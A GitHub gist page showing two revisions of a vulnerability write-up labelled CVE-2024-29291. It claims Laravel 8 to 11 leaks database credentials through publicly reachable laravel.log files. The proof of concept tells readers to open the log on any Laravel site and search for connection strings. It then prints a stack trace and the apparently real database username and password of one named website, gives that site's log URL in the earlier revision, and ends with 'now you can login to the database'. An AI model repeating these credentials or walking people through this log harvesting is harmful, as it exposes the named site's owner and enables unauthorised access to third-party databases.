-
-
Save petarbojic/0151c4e60608535e7bbcf645e2fb8708 to your computer and use it in GitHub Desktop.
Revisions
-
whiteman007 revised this gist
Apr 11, 2024 . 1 changed file with 31 additions and 12 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,52 +1,71 @@ CVE-ID: CVE-2024-29291 Description: A vulnerability has been discovered in the Laravel Framework in versions from 8.* to 11.*, allowing a remote attacker to obtain sensitive information via the laravel.log component. This vulnerability leads to the leakage of database credentials. Additional Information: None. Risk: High. Vulnerability Type: Database credential leak vulnerability. Vendor of Product: Laravel Framework. Affected Product Code Base: Laravel FRAMEWORK - 8.* - 11.* Affected Component: laravel.log. Attack Type: Remote. Impact Information Disclosure: True. Attack Vectors: Database credential leak vulnerability. Description: Access to private Database credential data is possible by logging into the website database. Additionally, login data for database access can be retrieved. Proof of concept: Go to any Laravel-based website and navigate to storage/logs/laravel.log. Open the file and search for "PDO->__construct('mysql:host=". The result: shell Copy code #0 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(70): PDO->__construct('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array) #1 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(46): Illuminate\Database\Connectors\Connector->createPdoConnection('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array) Credentials: Username: u429384055_jscv Password: Jaly$$a0p0p0p0 Host: sql1... Now you can login to the database. By: Huseein Amer Facebook: https://www.facebook.com/hussein.amer.75491/ -
Mar 28, 2024 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,52 @@ CVE-ID: CVE-2024-29291 Suggested Description: An issue in Laravel Framework v8.* through v11.* allows a remote attacker to obtain sensitive information via the laravel.log component. Additional Information: None. Risk: High Vulnerability Type: Database credential leak vulnerability. Vendor of Product: Laravel Framework. Affected Product Code Base: Laravel FRAMEWORK - 8.* - 11.* Affected Component: laravel.log Attack Type: Remote. Impact Information Disclosure: True. Attack Vectors: Database credential leak vulnerability. Description: You can access private Database credential data by logging into the website database. Proof of concept: Go to any Laravel-based website and navigate to storage/logs/laravel.log. Example: https://js-cvdocs.online/storage/logs/laravel.log Open the file and search for "PDO->__construct('mysql:host=". The result: shell Copy code #0 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(70): PDO->__construct('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array) #1 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(46): Illuminate\Database\Connectors\Connector->createPdoConnection('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array) Credentials: Username: u429384055_jscv Password: Jaly$$a0p0p0p0 Host: sql1... now you can login to database by:Huseein Amer face:https://www.facebook.com/hussein.amer.75491/